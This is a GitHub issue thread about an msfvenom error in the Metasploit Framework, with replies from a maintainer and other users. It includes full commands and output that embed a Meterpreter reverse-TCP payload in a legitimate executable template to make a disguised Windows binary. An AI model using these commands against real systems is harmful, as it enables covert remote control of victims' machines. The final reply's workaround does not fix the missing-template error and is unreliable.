### ISSUE TITLE
Error: No such file or directory @ rb_sysopen -

### ISSUE THREAD

**Issue by IsaacSxm** [rapid7/metasploit-framework#13166]
## Steps to reproduce

How'd you do it?

1. Open terminal as root user. Enter the code below
2. msfvenom -p windows/meterpreter/reverse_tcp -k -x original_file.exe LHOST=[YOUR_IP] LPORT=[PORT] -f exe -o clone_file.exe

## Expected behavior
Payload size: xxx bytes

What should happen?
Payload should be generated
## Current behavior
Error: No such file or directory @ rb_sysopen - ./original_file.exe

What happens instead?
It shows error and does not upload payload.

### Metasploit version
5.0.41-dev

![InkedKali-Linux-2019 2-vmware-amd64-2020-03-28-22-36-11_LI](https://user-images.githubusercontent.com/47461659/77834670-9afad280-7146-11ea-8fe1-fda334d8186c.jpg)

### OS
Kali linux

**Comment by bcoles** [comment]
The `-x` argument is used to specify a custom executable file to use as a template.

The `-x` argument requires a path to an existing executable.

`No such file or directory` implies that the filename provided in the `-x` argument does not exist.

```
# ruby -W0 ./msfvenom -p windows/meterpreter/reverse_tcp -k -x /usr/share/dbd/binaries/dbd.exe LHOST=172.16.191.165 LPORT=1337 -f exe -o clone_file.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 67072 bytes
Saved as: clone_file.exe
# file clone_file.exe 
clone_file.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
```

**Comment by aditya2482** [comment]
select a platform using --platform <platform (ie windows)> and select the processor type by -a <x86 or x64 or  x32> 
No such file or directory @ rb_sysopen - ./original_file.exe should be ~/original_file.exe or the path where u wanna store

**Comment by hshrsh** [comment]
another easy way to solve the problem is :
touch < file name you desire > :: do this before creating payload file with msfvenom\
